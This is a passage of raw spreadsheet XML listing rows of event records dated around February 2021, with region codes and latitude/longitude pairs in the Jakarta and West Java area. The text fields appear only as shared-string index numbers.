        <v>621</v>
      </c>
      <c r="R3483" t="s">
        <v>84</v>
      </c>
      <c r="S3483" t="s">
        <v>32</v>
      </c>
      <c r="T3483" t="s">
        <v>33</v>
      </c>
      <c r="U3483" s="5">
        <v>10672814</v>
      </c>
      <c r="V3483" s="5" t="s">
        <v>17590</v>
      </c>
      <c r="W3483" s="5">
        <v>-616847</v>
      </c>
      <c r="X3483" t="s">
        <v>21323</v>
      </c>
      <c r="Y3483" t="str">
        <f t="shared" si="54"/>
        <v>-6.16847,106.72814</v>
      </c>
    </row>
    <row r="3484" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3484">
        <v>264338</v>
      </c>
      <c r="B3484" s="1">
        <v>44247</v>
      </c>
      <c r="C3484" s="2">
        <v>0.55569444444444438</v>
      </c>
      <c r="D3484" t="s">
        <v>22</v>
      </c>
      <c r="E3484" t="s">
        <v>23</v>
      </c>
      <c r="F3484" t="s">
        <v>11559</v>
      </c>
      <c r="H3484" t="s">
        <v>26</v>
      </c>
      <c r="I3484" t="s">
        <v>11560</v>
      </c>
      <c r="J3484" t="s">
        <v>2627</v>
      </c>
      <c r="L3484" t="s">
        <v>11561</v>
      </c>
      <c r="M3484">
        <v>3216081006</v>
      </c>
      <c r="N3484">
        <v>3216081</v>
      </c>
      <c r="O3484">
        <v>3216</v>
      </c>
      <c r="P3484">
        <v>32</v>
      </c>
      <c r="Q3484" t="s">
        <v>2511</v>
      </c>
      <c r="R3484" t="s">
        <v>2512</v>
      </c>
      <c r="S3484" t="s">
        <v>41</v>
      </c>
      <c r="T3484" t="s">
        <v>42</v>
      </c>
      <c r="U3484" s="5">
        <v>10704216</v>
      </c>
      <c r="V3484" s="5" t="s">
        <v>17591</v>
      </c>
      <c r="W3484" s="5">
        <v>-624080</v>
      </c>
      <c r="X3484" t="s">
        <v>21324</v>
      </c>
      <c r="Y3484" t="str">
        <f t="shared" si="54"/>
        <v>-6.24080,107.04216</v>
      </c>
    </row>
    <row r="3485" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3485">
        <v>264339</v>
      </c>
      <c r="B3485" s="1">
        <v>44247</v>
      </c>
      <c r="C3485" s="2">
        <v>0.55625000000000002</v>
      </c>
      <c r="D3485" t="s">
        <v>22</v>
      </c>
      <c r="E3485" t="s">
        <v>23</v>
      </c>
      <c r="F3485" t="s">
        <v>11562</v>
      </c>
      <c r="G3485" t="s">
        <v>11563</v>
      </c>
      <c r="H3485" t="s">
        <v>26</v>
      </c>
      <c r="I3485" t="s">
        <v>380</v>
      </c>
      <c r="J3485" t="s">
        <v>3135</v>
      </c>
      <c r="L3485" t="s">
        <v>11564</v>
      </c>
      <c r="M3485">
        <v>3671021007</v>
      </c>
      <c r="N3485">
        <v>3671021</v>
      </c>
      <c r="O3485">
        <v>3671</v>
      </c>
      <c r="P3485">
        <v>36</v>
      </c>
      <c r="Q3485" t="s">
        <v>454</v>
      </c>
      <c r="R3485" t="s">
        <v>454</v>
      </c>
      <c r="S3485" t="s">
        <v>201</v>
      </c>
      <c r="T3485" t="s">
        <v>171</v>
      </c>
      <c r="U3485" s="5">
        <v>10669199</v>
      </c>
      <c r="V3485" s="5" t="s">
        <v>17592</v>
      </c>
      <c r="W3485" s="5">
        <v>-621985</v>
      </c>
      <c r="X3485" t="s">
        <v>21325</v>
      </c>
      <c r="Y3485" t="str">
        <f t="shared" si="54"/>
        <v>-6.21985,106.69199</v>
      </c>
    </row>
    <row r="3486" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3486">
        <v>264378</v>
      </c>
      <c r="B3486" s="1">
        <v>44247</v>
      </c>
      <c r="C3486" s="2">
        <v>0.5597685185185185</v>
      </c>
      <c r="D3486" t="s">
        <v>22</v>
      </c>
      <c r="E3486" t="s">
        <v>23</v>
      </c>
      <c r="F3486" t="s">
        <v>11565</v>
      </c>
      <c r="G3486" t="s">
        <v>11566</v>
      </c>
      <c r="H3486" t="s">
        <v>26</v>
      </c>
      <c r="I3486" t="s">
        <v>961</v>
      </c>
      <c r="J3486" t="s">
        <v>4337</v>
      </c>
      <c r="L3486" t="s">
        <v>11567</v>
      </c>
      <c r="M3486">
        <v>3171100001</v>
      </c>
      <c r="N3486">
        <v>3171100</v>
      </c>
      <c r="O3486">
        <v>3171</v>
      </c>
      <c r="P3486">
        <v>31</v>
      </c>
      <c r="Q3486" t="s">
        <v>1474</v>
      </c>
      <c r="R3486" t="s">
        <v>107</v>
      </c>
      <c r="S3486" t="s">
        <v>108</v>
      </c>
      <c r="T3486" t="s">
        <v>33</v>
      </c>
      <c r="U3486" s="5">
        <v>10681888</v>
      </c>
      <c r="V3486" s="5" t="s">
        <v>17593</v>
      </c>
      <c r="W3486" s="5">
        <v>-622203</v>
      </c>
      <c r="X3486" t="s">
        <v>21326</v>
      </c>
      <c r="Y3486" t="str">
        <f t="shared" si="54"/>
        <v>-6.22203,106.81888</v>
      </c>
    </row>
    <row r="3487" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3487">
        <v>264455</v>
      </c>
      <c r="B3487" s="1">
        <v>44247</v>
      </c>
      <c r="C3487" s="2">
        <v>0.56649305555555551</v>
      </c>
      <c r="D3487" t="s">
        <v>22</v>
      </c>
      <c r="E3487" t="s">
        <v>23</v>
      </c>
      <c r="F3487" t="s">
        <v>11568</v>
      </c>
      <c r="G3487" t="s">
        <v>11569</v>
      </c>
      <c r="H3487" t="s">
        <v>26</v>
      </c>
      <c r="I3487" t="s">
        <v>197</v>
      </c>
      <c r="J3487" t="s">
        <v>3135</v>
      </c>
      <c r="M3487">
        <v>3174070001</v>
      </c>
      <c r="N3487">
        <v>3174070</v>
      </c>
      <c r="O3487">
        <v>3174</v>
      </c>
      <c r="P3487">
        <v>31</v>
      </c>
      <c r="Q3487" t="s">
        <v>83</v>
      </c>
      <c r="R3487" t="s">
        <v>84</v>
      </c>
      <c r="S3487" t="s">
        <v>32</v>
      </c>
      <c r="T3487" t="s">
        <v>33</v>
      </c>
      <c r="U3487" s="5">
        <v>10671736</v>
      </c>
      <c r="V3487" s="5" t="s">
        <v>17594</v>
      </c>
      <c r="W3487" s="5">
        <v>-618333</v>
      </c>
      <c r="X3487" t="s">
        <v>21327</v>
      </c>
      <c r="Y3487" t="str">
        <f t="shared" si="54"/>
        <v>-6.18333,106.71736</v>
      </c>
    </row>
    <row r="3488" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3488">
        <v>264456</v>
      </c>
      <c r="B3488" s="1">
        <v>44247</v>
      </c>
      <c r="C3488" s="2">
        <v>0.56689814814814821</v>
      </c>
      <c r="D3488" t="s">
        <v>22</v>
      </c>
      <c r="E3488" t="s">
        <v>23</v>
      </c>
      <c r="F3488" t="s">
        <v>11570</v>
      </c>
      <c r="G3488" t="s">
        <v>11571</v>
      </c>
      <c r="H3488" t="s">
        <v>26</v>
      </c>
      <c r="I3488" t="s">
        <v>3704</v>
      </c>
      <c r="J3488" t="s">
        <v>11572</v>
      </c>
      <c r="L3488" t="s">
        <v>11573</v>
      </c>
      <c r="M3488">
        <v>3171070002</v>
      </c>
      <c r="N3488">
        <v>3171070</v>
      </c>
      <c r="O3488">
        <v>3171</v>
      </c>
      <c r="P3488">
        <v>31</v>
      </c>
      <c r="Q3488" t="s">
        <v>2142</v>
      </c>
      <c r="R3488" t="s">
        <v>121</v>
      </c>
      <c r="S3488" t="s">
        <v>108</v>
      </c>
      <c r="T3488" t="s">
        <v>33</v>
      </c>
      <c r="U3488" s="5">
        <v>10681012</v>
      </c>
      <c r="V3488" s="5" t="s">
        <v>17595</v>
      </c>
      <c r="W3488" s="5">
        <v>-625121</v>
      </c>
      <c r="X3488" t="s">
        <v>21328</v>
      </c>
      <c r="Y3488" t="str">
        <f t="shared" si="54"/>
        <v>-6.25121,106.81012</v>
      </c>
    </row>
    <row r="3489" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3489">
        <v>264495</v>
      </c>
      <c r="B3489" s="1">
        <v>44247</v>
      </c>
      <c r="C3489" s="2">
        <v>0.56833333333333336</v>
      </c>
      <c r="D3489" t="s">
        <v>22</v>
      </c>
      <c r="E3489" t="s">
        <v>23</v>
      </c>
      <c r="F3489" t="s">
        <v>11574</v>
      </c>
      <c r="G3489" t="s">
        <v>11575</v>
      </c>
      <c r="H3489" t="s">
        <v>26</v>
      </c>
      <c r="I3489" t="s">
        <v>893</v>
      </c>
      <c r="J3489" t="s">
        <v>3135</v>
      </c>
      <c r="L3489" t="s">
        <v>11576</v>
      </c>
      <c r="M3489">
        <v>3671010001</v>
      </c>
      <c r="N3489">
        <v>3671010</v>
      </c>
      <c r="O3489">
        <v>3671</v>
      </c>
      <c r="P3489">
        <v>36</v>
      </c>
      <c r="Q3489" t="s">
        <v>4656</v>
      </c>
      <c r="R3489" t="s">
        <v>200</v>
      </c>
      <c r="S3489" t="s">
        <v>201</v>
      </c>
      <c r="T3489" t="s">
        <v>171</v>
      </c>
      <c r="U3489" s="5">
        <v>10669679</v>
      </c>
      <c r="V3489" s="5" t="s">
        <v>17596</v>
      </c>
      <c r="W3489" s="5">
        <v>-624227</v>
      </c>
      <c r="X3489" t="s">
        <v>21329</v>
      </c>
      <c r="Y3489" t="str">
        <f t="shared" si="54"/>
        <v>-6.24227,106.69679</v>
      </c>
    </row>
    <row r="3490" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3490">
        <v>264496</v>
      </c>
      <c r="B3490" s="1">
        <v>44247</v>
      </c>
      <c r="C3490" s="2">
        <v>0.57182870370370364</v>
      </c>
      <c r="D3490" t="s">
        <v>22</v>
      </c>
      <c r="E3490" t="s">
        <v>23</v>
      </c>
      <c r="F3490" t="s">
        <v>11577</v>
      </c>
      <c r="G3490" t="s">
        <v>11578</v>
      </c>
      <c r="H3490" t="s">
        <v>26</v>
      </c>
      <c r="I3490" t="s">
        <v>722</v>
      </c>
      <c r="J3490" t="s">
        <v>10692</v>
      </c>
      <c r="L3490" t="s">
        <v>11579</v>
      </c>
      <c r="M3490">
        <v>3171020002</v>
      </c>
      <c r="N3490">
        <v>3171020</v>
      </c>
      <c r="O3490">
        <v>3171</v>
      </c>
      <c r="P3490">
        <v>31</v>
      </c>
      <c r="Q3490" t="s">
        <v>1172</v>
      </c>
      <c r="R3490" t="s">
        <v>484</v>
      </c>
      <c r="S3490" t="s">
        <v>108</v>
      </c>
      <c r="T3490" t="s">
        <v>33</v>
      </c>
      <c r="U3490" s="5">
        <v>10681814</v>
      </c>
      <c r="V3490" s="5" t="s">
        <v>17597</v>
      </c>
      <c r="W3490" s="5">
        <v>-629614</v>
      </c>
      <c r="X3490" t="s">
        <v>21330</v>
      </c>
      <c r="Y3490" t="str">
        <f t="shared" si="54"/>
        <v>-6.29614,106.81814</v>
      </c>
    </row>
    <row r="3491" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3491">
        <v>264535</v>
      </c>
      <c r="B3491" s="1">
        <v>44247</v>
      </c>
      <c r="C3491" s="2">
        <v>0.57339120370370367</v>
      </c>
      <c r="D3491" t="s">
        <v>22</v>
      </c>
      <c r="E3491" t="s">
        <v>23</v>
      </c>
      <c r="F3491" t="s">
        <v>11580</v>
      </c>
      <c r="H3491" t="s">
        <v>26</v>
      </c>
      <c r="I3491" t="s">
        <v>11581</v>
      </c>
      <c r="J3491" t="s">
        <v>3135</v>
      </c>
      <c r="L3491" t="s">
        <v>11582</v>
      </c>
      <c r="M3491">
        <v>3674010005</v>
      </c>
      <c r="N3491">
        <v>3674010</v>
      </c>
      <c r="O3491">
        <v>3674</v>
      </c>
      <c r="P3491">
        <v>36</v>
      </c>
      <c r="Q3491" t="s">
        <v>11583</v>
      </c>
      <c r="R3491" t="s">
        <v>1256</v>
      </c>
      <c r="S3491" t="s">
        <v>170</v>
      </c>
      <c r="T3491" t="s">
        <v>171</v>
      </c>
      <c r="U3491" s="5">
        <v>10669755</v>
      </c>
      <c r="V3491" s="5" t="s">
        <v>17598</v>
      </c>
      <c r="W3491" s="5">
        <v>-635494</v>
      </c>
      <c r="X3491" t="s">
        <v>21331</v>
      </c>
      <c r="Y3491" t="str">
        <f t="shared" si="54"/>
        <v>-6.35494,106.69755</v>
      </c>
    </row>
    <row r="3492" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3492">
        <v>264585</v>
      </c>
      <c r="B3492" s="1">
        <v>44247</v>
      </c>
      <c r="C3492" s="2">
        <v>0.5756944444444444</v>
      </c>
      <c r="D3492" t="s">
        <v>2648</v>
      </c>
      <c r="E3492" t="s">
        <v>23</v>
      </c>
      <c r="G3492" t="s">
        <v>11584</v>
      </c>
      <c r="H3492" t="s">
        <v>26</v>
      </c>
      <c r="J3492" t="s">
        <v>4197</v>
      </c>
      <c r="L3492" t="s">
        <v>11585</v>
      </c>
      <c r="M3492">
        <v>3172020005</v>
      </c>
      <c r="N3492">
        <v>3172020</v>
      </c>
      <c r="O3492">
        <v>3172</v>
      </c>
      <c r="P3492">
        <v>31</v>
      </c>
      <c r="Q3492" t="s">
        <v>3744</v>
      </c>
      <c r="R3492" t="s">
        <v>1644</v>
      </c>
      <c r="S3492" t="s">
        <v>49</v>
      </c>
      <c r="T3492" t="s">
        <v>33</v>
      </c>
      <c r="U3492" s="5">
        <v>10687334</v>
      </c>
      <c r="V3492" s="5" t="s">
        <v>17599</v>
      </c>
      <c r="W3492" s="5">
        <v>-630435</v>
      </c>
      <c r="X3492" t="s">
        <v>21332</v>
      </c>
      <c r="Y3492" t="str">
        <f t="shared" si="54"/>
        <v>-6.30435,106.87334</v>
      </c>
    </row>
    <row r="3493" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3493">
        <v>264691</v>
      </c>
      <c r="B3493" s="1">
        <v>44247</v>
      </c>
      <c r="C3493" s="2">
        <v>0.58666666666666667</v>
      </c>
      <c r="D3493" t="s">
        <v>22</v>
      </c>
      <c r="E3493" t="s">
        <v>23</v>
      </c>
      <c r="F3493" t="s">
        <v>11586</v>
      </c>
      <c r="H3493" t="s">
        <v>26</v>
      </c>
      <c r="I3493" t="s">
        <v>2442</v>
      </c>
      <c r="J3493" t="s">
        <v>2627</v>
      </c>
      <c r="L3493" t="s">
        <v>11587</v>
      </c>
      <c r="M3493">
        <v>3275050001</v>
      </c>
      <c r="N3493">
        <v>3275050</v>
      </c>
      <c r="O3493">
        <v>3275</v>
      </c>
      <c r="P3493">
        <v>32</v>
      </c>
      <c r="Q3493" t="s">
        <v>4376</v>
      </c>
      <c r="R3493" t="s">
        <v>955</v>
      </c>
      <c r="S3493" t="s">
        <v>41</v>
      </c>
      <c r="T3493" t="s">
        <v>42</v>
      </c>
      <c r="U3493" s="5">
        <v>10695686</v>
      </c>
      <c r="V3493" s="5" t="s">
        <v>17600</v>
      </c>
      <c r="W3493" s="5">
        <v>-626705</v>
      </c>
      <c r="X3493" t="s">
        <v>21333</v>
      </c>
      <c r="Y3493" t="str">
        <f t="shared" si="54"/>
        <v>-6.26705,106.95686</v>
      </c>
    </row>
    <row r="3494" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3494">
        <v>264927</v>
      </c>
      <c r="B3494" s="1">
        <v>44247</v>
      </c>
      <c r="C3494" s="2">
        <v>0.60682870370370368</v>
      </c>
      <c r="D3494" t="s">
        <v>22</v>
      </c>
      <c r="E3494" t="s">
        <v>23</v>
      </c>
      <c r="F3494" t="s">
        <v>11588</v>
      </c>
      <c r="H3494" t="s">
        <v>26</v>
      </c>
      <c r="I3494" t="s">
        <v>11310</v>
      </c>
      <c r="J3494" t="s">
        <v>11552</v>
      </c>
      <c r="L3494" t="s">
        <v>11589</v>
      </c>
      <c r="M3494">
        <v>3171060009</v>
      </c>
      <c r="N3494">
        <v>3171060</v>
      </c>
      <c r="O3494">
        <v>3171</v>
      </c>
      <c r="P3494">
        <v>31</v>
      </c>
      <c r="Q3494" t="s">
        <v>11179</v>
      </c>
      <c r="R3494" t="s">
        <v>1236</v>
      </c>
      <c r="S3494" t="s">
        <v>108</v>
      </c>
      <c r="T3494" t="s">
        <v>33</v>
      </c>
      <c r="U3494" s="5">
        <v>10681773</v>
      </c>
      <c r="V3494" s="5" t="s">
        <v>17601</v>
      </c>
      <c r="W3494" s="5">
        <v>-623524</v>
      </c>
      <c r="X3494" t="s">
        <v>21334</v>
      </c>
      <c r="Y3494" t="str">
        <f t="shared" si="54"/>
        <v>-6.23524,106.81773</v>
      </c>
    </row>
    <row r="3495" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3495">
        <v>265045</v>
      </c>
      <c r="B3495" s="1">
        <v>44247</v>
      </c>
      <c r="C3495" s="2">
        <v>0.61803240740740739</v>
      </c>
      <c r="D3495" t="s">
        <v>22</v>
      </c>
      <c r="E3495" t="s">
        <v>23</v>
      </c>
      <c r="F3495" t="s">
        <v>11590</v>
      </c>
      <c r="G3495" t="s">
        <v>11591</v>
      </c>
      <c r="H3495" t="s">
        <v>26</v>
      </c>
      <c r="I3495" t="s">
        <v>4261</v>
      </c>
      <c r="J3495" t="s">
        <v>2627</v>
      </c>
      <c r="L3495" t="s">
        <v>11592</v>
      </c>
      <c r="M3495">
        <v>3275060002</v>
      </c>
      <c r="N3495">
        <v>3275060</v>
      </c>
      <c r="O3495">
        <v>3275</v>
      </c>
      <c r="P3495">
        <v>32</v>
      </c>
      <c r="Q3495" t="s">
        <v>113</v>
      </c>
      <c r="R3495" t="s">
        <v>114</v>
      </c>
      <c r="S3495" t="s">
        <v>41</v>
      </c>
      <c r="T3495" t="s">
        <v>42</v>
      </c>
      <c r="U3495" s="5">
        <v>10696860</v>
      </c>
      <c r="V3495" s="5" t="s">
        <v>17463</v>
      </c>
      <c r="W3495" s="5">
        <v>-622610</v>
      </c>
      <c r="X3495" t="s">
        <v>21335</v>
      </c>
      <c r="Y3495" t="str">
        <f t="shared" si="54"/>
        <v>-6.22610,106.96860</v>
      </c>
    </row>
    <row r="3496" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3496">
        <v>265319</v>
      </c>
      <c r="B3496" s="1">
        <v>44247</v>
      </c>
      <c r="C3496" s="2">
        <v>0.64187499999999997</v>
      </c>
      <c r="D3496" t="s">
        <v>22</v>
      </c>
      <c r="E3496" t="s">
        <v>23</v>
      </c>
      <c r="F3496" t="s">
        <v>11593</v>
      </c>
      <c r="G3496" t="s">
        <v>11594</v>
      </c>
      <c r="H3496" t="s">
        <v>26</v>
      </c>
      <c r="I3496" t="s">
        <v>555</v>
      </c>
      <c r="J3496" t="s">
        <v>2627</v>
      </c>
      <c r="M3496">
        <v>3216081001</v>
      </c>
      <c r="N3496">
        <v>3216081</v>
      </c>
      <c r="O3496">
        <v>3216</v>
      </c>
      <c r="P3496">
        <v>32</v>
      </c>
      <c r="Q3496" t="s">
        <v>1726</v>
      </c>
      <c r="R3496" t="s">
        <v>2512</v>
      </c>
      <c r="S3496" t="s">
        <v>41</v>
      </c>
      <c r="T3496" t="s">
        <v>42</v>
      </c>
      <c r="U3496" s="5">
        <v>10702665</v>
      </c>
      <c r="V3496" s="5" t="s">
        <v>17602</v>
      </c>
      <c r="W3496" s="5">
        <v>-627683</v>
      </c>
      <c r="X3496" t="s">
        <v>21336</v>
      </c>
      <c r="Y3496" t="str">
        <f t="shared" si="54"/>
        <v>-6.27683,107.02665</v>
      </c>
    </row>
    <row r="3497" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3497">
        <v>265437</v>
      </c>
      <c r="B3497" s="1">
        <v>44247</v>
      </c>
      <c r="C3497" s="2">
        <v>0.65335648148148151</v>
      </c>
      <c r="D3497" t="s">
        <v>22</v>
      </c>
      <c r="E3497" t="s">
        <v>23</v>
      </c>
      <c r="F3497" t="s">
        <v>11595</v>
      </c>
      <c r="H3497" t="s">
        <v>26</v>
      </c>
      <c r="I3497" t="s">
        <v>882</v>
      </c>
      <c r="J3497" t="s">
        <v>2608</v>
      </c>
      <c r="L3497" t="s">
        <v>11596</v>
      </c>
      <c r="M3497">
        <v>3318090021</v>
      </c>
      <c r="N3497">
        <v>3318090</v>
      </c>
      <c r="O3497">
        <v>3318</v>
      </c>
      <c r="P3497">
        <v>33</v>
      </c>
      <c r="Q3497" t="s">
        <v>11597</v>
      </c>
      <c r="R3497" t="s">
        <v>11598</v>
      </c>
      <c r="S3497" t="s">
        <v>2986</v>
      </c>
      <c r="T3497" t="s">
        <v>1134</v>
      </c>
      <c r="U3497" s="5">
        <v>11108489</v>
      </c>
      <c r="V3497" s="5" t="s">
        <v>17603</v>
      </c>
      <c r="W3497" s="5">
        <v>-674691</v>
      </c>
      <c r="X3497" t="s">
        <v>21337</v>
      </c>
      <c r="Y3497" t="str">
        <f t="shared" si="54"/>
        <v>-6.74691,111.08489</v>
      </c>
    </row>
    <row r="3498" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3498">
        <v>265495</v>
      </c>
      <c r="B3498" s="1">
        <v>44247</v>
      </c>
      <c r="C3498" s="2">
        <v>0.57916666666666672</v>
      </c>
      <c r="D3498" t="s">
        <v>2648</v>
      </c>
      <c r="E3498" t="s">
        <v>23</v>
      </c>
      <c r="G3498" t="s">
        <v>11599</v>
      </c>
      <c r="H3498" t="s">
        <v>26</v>
      </c>
      <c r="J3498" t="s">
        <v>4282</v>
      </c>
      <c r="L3498" t="s">
        <v>11600</v>
      </c>
      <c r="M3498">
        <v>3171070005</v>
      </c>
      <c r="N3498">
        <v>3171070</v>
      </c>
      <c r="O3498">
        <v>3171</v>
      </c>
      <c r="P3498">
        <v>31</v>
      </c>
      <c r="Q3498" t="s">
        <v>218</v>
      </c>
      <c r="R3498" t="s">
        <v>121</v>
      </c>
      <c r="S3498" t="s">
        <v>108</v>
      </c>
      <c r="T3498" t="s">
        <v>33</v>
      </c>
      <c r="U3498" s="5">
        <v>10681831</v>
      </c>
      <c r="V3498" s="5" t="s">
        <v>17604</v>
      </c>
      <c r="W3498" s="5">
        <v>-623366</v>
      </c>
      <c r="X3498" t="s">
        <v>21338</v>
      </c>
      <c r="Y3498" t="str">
        <f t="shared" si="54"/>
        <v>-6.23366,106.81831</v>
      </c>
    </row>
    <row r="3499" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3499">
        <v>265517</v>
      </c>
      <c r="B3499" s="1">
        <v>44247</v>
      </c>
      <c r="C3499" s="2">
        <v>0.65983796296296293</v>
      </c>
      <c r="D3499" t="s">
        <v>22</v>
      </c>
      <c r="E3499" t="s">
        <v>23</v>
      </c>
      <c r="F3499" t="s">
        <v>11601</v>
      </c>
      <c r="H3499" t="s">
        <v>26</v>
      </c>
      <c r="I3499" t="s">
        <v>27</v>
      </c>
      <c r="J3499" t="s">
        <v>1047</v>
      </c>
      <c r="L3499" t="s">
        <v>11602</v>
      </c>
      <c r="M3499">
        <v>3174070001</v>
      </c>
      <c r="N3499">
        <v>3174070</v>
      </c>
      <c r="O3499">
        <v>3174</v>
      </c>
      <c r="P3499">
        <v>31</v>
      </c>
      <c r="Q3499" t="s">
        <v>83</v>
      </c>
      <c r="R3499" t="s">
        <v>84</v>
      </c>
      <c r="S3499" t="s">
        <v>32</v>
      </c>
      <c r="T3499" t="s">
        <v>33</v>
      </c>
      <c r="U3499" s="5">
        <v>10672735</v>
      </c>
      <c r="V3499" s="5" t="s">
        <v>17605</v>
      </c>
      <c r="W3499" s="5">
        <v>-616755</v>
      </c>
      <c r="X3499" t="s">
        <v>21339</v>
      </c>
      <c r="Y3499" t="str">
        <f t="shared" si="54"/>
        <v>-6.16755,106.72735</v>
      </c>
    </row>
    <row r="3500" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3500">
        <v>265558</v>
      </c>
      <c r="B3500" s="1">
        <v>44247</v>
      </c>
      <c r="C3500" s="2">
        <v>0.66096064814814814</v>
      </c>
      <c r="D3500" t="s">
        <v>22</v>
      </c>
      <c r="E3500" t="s">
        <v>23</v>
      </c>
      <c r="F3500" t="s">
        <v>11603</v>
      </c>
      <c r="G3500" t="s">
        <v>11604</v>
      </c>
      <c r="H3500" t="s">
        <v>26</v>
      </c>
      <c r="I3500" t="s">
        <v>1538</v>
      </c>
      <c r="J3500" t="s">
        <v>1491</v>
      </c>
      <c r="L3500" t="s">
        <v>11605</v>
      </c>
      <c r="M3500">
        <v>3174070003</v>
      </c>
      <c r="N3500">
        <v>3174070</v>
      </c>
      <c r="O3500">
        <v>3174</v>
      </c>
      <c r="P3500">
        <v>31</v>
      </c>
      <c r="Q3500" t="s">
        <v>1260</v>
      </c>
      <c r="R3500" t="s">
        <v>84</v>
      </c>
      <c r="S3500" t="s">
        <v>32</v>
      </c>
      <c r="T3500" t="s">
        <v>33</v>
      </c>
      <c r="U3500" s="5">
        <v>10676418</v>
      </c>
      <c r="V3500" s="5" t="s">
        <v>17606</v>
      </c>
      <c r="W3500" s="5">
        <v>-615968</v>
      </c>
      <c r="X3500" t="s">
        <v>21340</v>
      </c>
      <c r="Y3500" t="str">
        <f t="shared" si="54"/>
        <v>-6.15968,106.76418</v>
      </c>
    </row>
    <row r="3501" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3501">
        <v>265559</v>
      </c>
      <c r="B3501" s="1">
        <v>44247</v>
      </c>
      <c r="C3501" s="2">
        <v>0.66112268518518513</v>
      </c>
      <c r="D3501" t="s">
        <v>22</v>
      </c>
      <c r="E3501" t="s">
        <v>23</v>
      </c>
      <c r="F3501" t="s">
        <v>11606</v>
      </c>
      <c r="G3501" t="s">
        <v>11607</v>
      </c>
      <c r="H3501" t="s">
        <v>26</v>
      </c>
      <c r="I3501" t="s">
        <v>137</v>
      </c>
      <c r="J3501" t="s">
        <v>6214</v>
      </c>
      <c r="L3501" t="s">
        <v>11608</v>
      </c>
      <c r="M3501">
        <v>3174010005</v>
      </c>
      <c r="N3501">
        <v>3174010</v>
      </c>
      <c r="O3501">
        <v>3174</v>
      </c>
      <c r="P3501">
        <v>31</v>
      </c>
      <c r="Q3501" t="s">
        <v>251</v>
      </c>
      <c r="R3501" t="s">
        <v>69</v>
      </c>
      <c r="S3501" t="s">
        <v>32</v>
      </c>
      <c r="T3501" t="s">
        <v>33</v>
      </c>
      <c r="U3501" s="5">
        <v>10672987</v>
      </c>
      <c r="V3501" s="5" t="s">
        <v>17607</v>
      </c>
      <c r="W3501" s="5">
        <v>-618524</v>
      </c>
      <c r="X3501" t="s">
        <v>21341</v>
      </c>
      <c r="Y3501" t="str">
        <f t="shared" si="54"/>
        <v>-6.18524,106.72987</v>
      </c>
    </row>
    <row r="3502" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3502">
        <v>265560</v>
      </c>
      <c r="B3502" s="1">
        <v>44247</v>
      </c>
      <c r="C3502" s="2">
        <v>0.66057870370370375</v>
      </c>
      <c r="D3502" t="s">
        <v>22</v>
      </c>
      <c r="E3502" t="s">
        <v>23</v>
      </c>
      <c r="F3502" t="s">
        <v>11609</v>
      </c>
      <c r="G3502" t="s">
        <v>11610</v>
      </c>
      <c r="H3502" t="s">
        <v>26</v>
      </c>
      <c r="I3502" t="s">
        <v>11611</v>
      </c>
      <c r="J3502" t="s">
        <v>2627</v>
      </c>
      <c r="L3502" t="s">
        <v>11612</v>
      </c>
      <c r="M3502">
        <v>3215031005</v>
      </c>
      <c r="N3502">
        <v>3215031</v>
      </c>
      <c r="O3502">
        <v>3215</v>
      </c>
      <c r="P3502">
        <v>32</v>
      </c>
      <c r="Q3502" t="s">
        <v>11419</v>
      </c>
      <c r="R3502" t="s">
        <v>11003</v>
      </c>
      <c r="S3502" t="s">
        <v>3979</v>
      </c>
      <c r="T3502" t="s">
        <v>42</v>
      </c>
      <c r="U3502" s="5">
        <v>10729308</v>
      </c>
      <c r="V3502" s="5" t="s">
        <v>17608</v>
      </c>
      <c r="W3502" s="5">
        <v>-633174</v>
      </c>
      <c r="X3502" t="s">
        <v>21342</v>
      </c>
      <c r="Y3502" t="str">
        <f t="shared" si="54"/>
        <v>-6.33174,107.29308</v>
      </c>
    </row>
    <row r="3503" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3503">
        <v>265601</v>
      </c>
      <c r="B3503" s="1">
        <v>44247</v>
      </c>
      <c r="C3503" s="2">
        <v>0.66622685185185182</v>
      </c>
      <c r="D3503" t="s">
        <v>22</v>
      </c>
      <c r="E3503" t="s">
        <v>23</v>
      </c>
      <c r="F3503" t="s">
        <v>11613</v>
      </c>
      <c r="H3503" t="s">
        <v>26</v>
      </c>
      <c r="I3503" t="s">
        <v>193</v>
      </c>
      <c r="J3503" t="s">
        <v>4337</v>
      </c>
      <c r="L3503" t="s">
        <v>11614</v>
      </c>
      <c r="M3503">
        <v>3171100001</v>
      </c>
      <c r="N3503">
        <v>3171100</v>
      </c>
      <c r="O3503">
        <v>3171</v>
      </c>
      <c r="P3503">
        <v>31</v>
      </c>
      <c r="Q3503" t="s">
        <v>1474</v>
      </c>
      <c r="R3503" t="s">
        <v>107</v>
      </c>
      <c r="S3503" t="s">
        <v>108</v>
      </c>
      <c r="T3503" t="s">
        <v>33</v>
      </c>
      <c r="U3503" s="5">
        <v>10681788</v>
      </c>
      <c r="V3503" s="5" t="s">
        <v>17609</v>
      </c>
      <c r="W3503" s="5">
        <v>-622247</v>
      </c>
      <c r="X3503" t="s">
        <v>21343</v>
      </c>
      <c r="Y3503" t="str">
        <f t="shared" si="54"/>
        <v>-6.22247,106.81788</v>
      </c>
    </row>
    <row r="3504" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3504">
        <v>265642</v>
      </c>
      <c r="B3504" s="1">
        <v>44247</v>
      </c>
      <c r="C3504" s="2">
        <v>0.67018518518518511</v>
      </c>
      <c r="D3504" t="s">
        <v>22</v>
      </c>
      <c r="E3504" t="s">
        <v>23</v>
      </c>
      <c r="F3504" t="s">
        <v>11615</v>
